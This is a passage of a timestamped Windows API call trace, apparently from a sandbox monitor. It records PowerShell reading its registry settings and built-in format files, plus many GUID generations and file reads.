	[0583.702] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.703] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0xbce, lpOverlapped=0x0) returned 1
	[0583.703] ReadFile (in: hFile=0x2f8, lpBuffer=0x31520ae, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x31520ae*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0583.703] ReadFile (in: hFile=0x2f8, lpBuffer=0x3152978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x3152978*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0583.703] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2f8) returned 0x0
	[0583.703] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0583.704] CoTaskMemAlloc (cb=0x5a) returned 0x3cd4f0
	[0583.704] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x3cd4f0, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0583.704] CoTaskMemFree (pv=0x3cd4f0) 
	[0583.704] RegCloseKey (hKey=0x2f8) returned 0x0
	[0583.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0583.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0583.705] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xcdaebdc5, Data2=0x2a79, Data3=0x4ce6, Data4=([0]=0x96, [1]=0xdb, [2]=0x3a, [3]=0xb4, [4]=0xc1, [5]=0x1c, [6]=0xb4, [7]=0xab))) returned 0x0
	[0583.705] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x4d84e47d, Data2=0xedf2, Data3=0x49a2, Data4=([0]=0x97, [1]=0x6e, [2]=0x92, [3]=0x95, [4]=0x49, [5]=0xc2, [6]=0x7c, [7]=0x83))) returned 0x0
	[0583.706] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x24fc4fec, Data2=0x6d48, Data3=0x486b, Data4=([0]=0x90, [1]=0x3a, [2]=0xba, [3]=0x39, [4]=0xe5, [5]=0xf4, [6]=0x35, [7]=0x69))) returned 0x0
	[0583.706] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x8d46e3fe, Data2=0x3c4, Data3=0x4ac8, Data4=([0]=0x90, [1]=0x32, [2]=0xe1, [3]=0x4d, [4]=0xe4, [5]=0x70, [6]=0x93, [7]=0xae))) returned 0x0
	[0583.706] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xc79d1bde, Data2=0x1748, Data3=0x405b, Data4=([0]=0xa9, [1]=0x95, [2]=0xa, [3]=0xa5, [4]=0x9e, [5]=0xc1, [6]=0xc7, [7]=0x23))) returned 0x0
	[0583.706] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xbfb83680, Data2=0x4b98, Data3=0x4bb3, Data4=([0]=0x84, [1]=0xde, [2]=0x80, [3]=0x19, [4]=0xb6, [5]=0x95, [6]=0x12, [7]=0x57))) returned 0x0
	[0583.706] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x39f07bb5, Data2=0x124a, Data3=0x4c4d, Data4=([0]=0x9d, [1]=0x95, [2]=0x52, [3]=0xf9, [4]=0x7a, [5]=0xe, [6]=0x28, [7]=0xa))) returned 0x0
	[0583.706] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x9c2b9e39, Data2=0xde5a, Data3=0x4934, Data4=([0]=0xa3, [1]=0xd, [2]=0x36, [3]=0x3b, [4]=0xd6, [5]=0x48, [6]=0x9e, [7]=0x58))) returned 0x0
	[0583.706] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x76572b6d, Data2=0x7511, Data3=0x41dc, Data4=([0]=0x81, [1]=0xdf, [2]=0xdf, [3]=0xc6, [4]=0x8a, [5]=0xcf, [6]=0x92, [7]=0xae))) returned 0x0
	[0583.707] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xdcc19df, Data2=0xd63, Data3=0x4f84, Data4=([0]=0x9a, [1]=0xae, [2]=0x59, [3]=0x2e, [4]=0x23, [5]=0xee, [6]=0x69, [7]=0x1f))) returned 0x0
	[0583.707] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x67cf401, Data2=0x7ee0, Data3=0x4bd8, Data4=([0]=0x91, [1]=0xb4, [2]=0x2f, [3]=0x96, [4]=0x12, [5]=0x54, [6]=0xae, [7]=0x36))) returned 0x0
	[0583.707] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x111cbe1c, Data2=0x4e14, Data3=0x452b, Data4=([0]=0xac, [1]=0x60, [2]=0x53, [3]=0x10, [4]=0xea, [5]=0x2c, [6]=0xc9, [7]=0xf4))) returned 0x0
	[0583.707] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xde1c0378, Data2=0xec6e, Data3=0x4320, Data4=([0]=0x9d, [1]=0xa1, [2]=0xef, [3]=0xf9, [4]=0x37, [5]=0x42, [6]=0x7b, [7]=0x9f))) returned 0x0
	[0583.707] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x77939ce, Data2=0xf736, Data3=0x4d4d, Data4=([0]=0x8d, [1]=0x88, [2]=0xa1, [3]=0x3c, [4]=0x77, [5]=0xff, [6]=0xa5, [7]=0x84))) returned 0x0
	[0583.707] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xd485d5b0, Data2=0x121e, Data3=0x440b, Data4=([0]=0x82, [1]=0x22, [2]=0x60, [3]=0x7c, [4]=0x7a, [5]=0x4e, [6]=0xd9, [7]=0xf9))) returned 0x0
	[0583.708] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xa68ab6ec, Data2=0xab36, Data3=0x4186, Data4=([0]=0x8e, [1]=0xb2, [2]=0x22, [3]=0xd8, [4]=0xa6, [5]=0xc5, [6]=0x88, [7]=0x76))) returned 0x0
	[0583.708] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xf313d3e, Data2=0x11be, Data3=0x4645, Data4=([0]=0x82, [1]=0xd2, [2]=0x32, [3]=0x55, [4]=0xfd, [5]=0xd, [6]=0x60, [7]=0xd7))) returned 0x0
	[0583.708] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xa7626f94, Data2=0x6e0c, Data3=0x4859, Data4=([0]=0xba, [1]=0x27, [2]=0x99, [3]=0x2b, [4]=0x89, [5]=0xe4, [6]=0x4d, [7]=0x19))) returned 0x0
	[0583.708] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xdb2a11a8, Data2=0x5ffa, Data3=0x4e24, Data4=([0]=0xb6, [1]=0xc2, [2]=0x21, [3]=0xfe, [4]=0x81, [5]=0x8b, [6]=0x4c, [7]=0x35))) returned 0x0
	[0583.708] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x35ab5829, Data2=0x1366, Data3=0x44d7, Data4=([0]=0xbb, [1]=0x4c, [2]=0x5, [3]=0x86, [4]=0x2e, [5]=0x26, [6]=0x33, [7]=0x8b))) returned 0x0
	[0583.708] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x301cdd7, Data2=0x5745, Data3=0x4c8d, Data4=([0]=0x92, [1]=0xd7, [2]=0x81, [3]=0xb4, [4]=0x6c, [5]=0xe4, [6]=0x6a, [7]=0xdd))) returned 0x0
	[0583.708] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x422cc8c6, Data2=0xedf4, Data3=0x4b51, Data4=([0]=0xa3, [1]=0x59, [2]=0x48, [3]=0x1a, [4]=0xf3, [5]=0x6d, [6]=0x1e, [7]=0x27))) returned 0x0
	[0583.708] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x276858ca, Data2=0xcae, Data3=0x4a62, Data4=([0]=0x84, [1]=0x8b, [2]=0x99, [3]=0x40, [4]=0xbe, [5]=0x92, [6]=0x15, [7]=0x66))) returned 0x0
	[0583.709] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x98b908b8, Data2=0x698c, Data3=0x4b59, Data4=([0]=0x87, [1]=0x4c, [2]=0xe1, [3]=0xf6, [4]=0xe6, [5]=0xe1, [6]=0x74, [7]=0xad))) returned 0x0
	[0583.709] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xd215d378, Data2=0x7e20, Data3=0x49db, Data4=([0]=0xa3, [1]=0xfd, [2]=0x7f, [3]=0x17, [4]=0x85, [5]=0x71, [6]=0xd7, [7]=0x8b))) returned 0x0
	[0583.709] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x29393fde, Data2=0x8d16, Data3=0x411b, Data4=([0]=0xb7, [1]=0x31, [2]=0x4f, [3]=0x70, [4]=0x7c, [5]=0x15, [6]=0xd8, [7]=0x6))) returned 0x0
	[0583.709] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x8e91fa20, Data2=0x5a8e, Data3=0x4ae4, Data4=([0]=0xba, [1]=0x7c, [2]=0xc9, [3]=0x5b, [4]=0x80, [5]=0xa8, [6]=0x6a, [7]=0xdc))) returned 0x0
	[0583.709] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xe4a418ab, Data2=0xe74a, Data3=0x45b6, Data4=([0]=0x94, [1]=0x4e, [2]=0xb6, [3]=0x40, [4]=0x6d, [5]=0x9b, [6]=0xe6, [7]=0x2e))) returned 0x0
	[0583.709] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xc8930835, Data2=0x39d5, Data3=0x49d7, Data4=([0]=0xaf, [1]=0x8, [2]=0x5, [3]=0xd4, [4]=0xc5, [5]=0x33, [6]=0x11, [7]=0xdb))) returned 0x0
	[0583.709] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x8094b806, Data2=0x4aba, Data3=0x44c0, Data4=([0]=0xb7, [1]=0x27, [2]=0x38, [3]=0x7, [4]=0x60, [5]=0x4b, [6]=0xa, [7]=0x29))) returned 0x0
	[0583.709] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x341ec8db, Data2=0x438e, Data3=0x47e7, Data4=([0]=0x8b, [1]=0x75, [2]=0x6e, [3]=0xa6, [4]=0x27, [5]=0xab, [6]=0xab, [7]=0xcb))) returned 0x0
	[0583.710] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x855d5af8, Data2=0x7ebb, Data3=0x47e7, Data4=([0]=0xae, [1]=0x2f, [2]=0xfa, [3]=0xed, [4]=0x30, [5]=0x69, [6]=0xeb, [7]=0xd4))) returned 0x0
	[0583.710] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xad54976b, Data2=0x689e, Data3=0x4947, Data4=([0]=0xb8, [1]=0x24, [2]=0x6e, [3]=0x93, [4]=0x32, [5]=0xa8, [6]=0x5d, [7]=0xcb))) returned 0x0
	[0583.710] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x6945f983, Data2=0x441f, Data3=0x4e2c, Data4=([0]=0x82, [1]=0x70, [2]=0x64, [3]=0xb6, [4]=0xc2, [5]=0xf6, [6]=0x5c, [7]=0x48))) returned 0x0
	[0583.710] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x910220d4, Data2=0x6c4d, Data3=0x45cb, Data4=([0]=0x95, [1]=0x5b, [2]=0x70, [3]=0xcb, [4]=0x49, [5]=0x2, [6]=0x73, [7]=0xf))) returned 0x0
	[0583.710] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x83fa8755, Data2=0xa226, Data3=0x46fa, Data4=([0]=0x90, [1]=0xb7, [2]=0xd1, [3]=0xee, [4]=0x73, [5]=0x71, [6]=0x57, [7]=0xf3))) returned 0x0
	[0583.711] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x6e5ee257, Data2=0x1a2f, Data3=0x40fd, Data4=([0]=0xbf, [1]=0x15, [2]=0x12, [3]=0xc8, [4]=0xe1, [5]=0xeb, [6]=0x9, [7]=0xf4))) returned 0x0
	[0583.711] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0583.711] GetFileType (hFile=0x2f8) returned 0x1
	[0583.711] SetErrorMode (uMode=0x1) returned 0x1
	[0583.711] GetFileType (hFile=0x2f8) returned 0x1
	[0583.711] ReadFile (in: hFile=0x2f8, lpBuffer=0x32637b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32637b0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.712] ReadFile (in: hFile=0x2f8, lpBuffer=0x32637b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32637b0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.712] ReadFile (in: hFile=0x2f8, lpBuffer=0x32637b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32637b0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.712] ReadFile (in: hFile=0x2f8, lpBuffer=0x32637b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32637b0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.713] ReadFile (in: hFile=0x2f8, lpBuffer=0x32637b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32637b0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.713] ReadFile (in: hFile=0x2f8, lpBuffer=0x32637b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32637b0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.713] ReadFile (in: hFile=0x2f8, lpBuffer=0x32637b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32637b0*, lpNumberOfBytesRead=0x22cf98*=0x119, lpOverlapped=0x0) returned 1
	[0583.713] ReadFile (in: hFile=0x2f8, lpBuffer=0x32637b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32637b0*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0583.714] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2f8) returned 0x0
	[0583.714] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0583.714] CoTaskMemAlloc (cb=0x5a) returned 0x3cd4f0
	[0583.714] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x3cd4f0, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0583.714] CoTaskMemFree (pv=0x3cd4f0) 
	[0583.714] RegCloseKey (hKey=0x2f8) returned 0x0
	[0583.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0583.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0583.715] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xe35f487b, Data2=0xdba2, Data3=0x4c70, Data4=([0]=0xb2, [1]=0x87, [2]=0x3d, [3]=0xa6, [4]=0xcc, [5]=0xfb, [6]=0xfb, [7]=0x9e))) returned 0x0
	[0583.715] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xa04279de, Data2=0x5157, Data3=0x4891, Data4=([0]=0xbd, [1]=0xab, [2]=0x49, [3]=0xb, [4]=0x88, [5]=0xd0, [6]=0x7c, [7]=0x40))) returned 0x0
	[0583.715] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x4b310995, Data2=0x25b6, Data3=0x4595, Data4=([0]=0xb7, [1]=0x8c, [2]=0xaa, [3]=0x5e, [4]=0x50, [5]=0xe2, [6]=0x27, [7]=0x6f))) returned 0x0
	[0583.715] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x12dc2f01, Data2=0x9012, Data3=0x4f0c, Data4=([0]=0x93, [1]=0x42, [2]=0x2b, [3]=0xf3, [4]=0xc8, [5]=0x60, [6]=0xc5, [7]=0x9e))) returned 0x0
	[0583.715] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0583.716] GetFileType (hFile=0x2f8) returned 0x1
	[0583.716] SetErrorMode (uMode=0x1) returned 0x1
	[0583.716] GetFileType (hFile=0x2f8) returned 0x1
	[0583.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.718] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.718] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.722] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.724] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.733] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.734] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.734] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.734] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.734] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.735] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.735] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
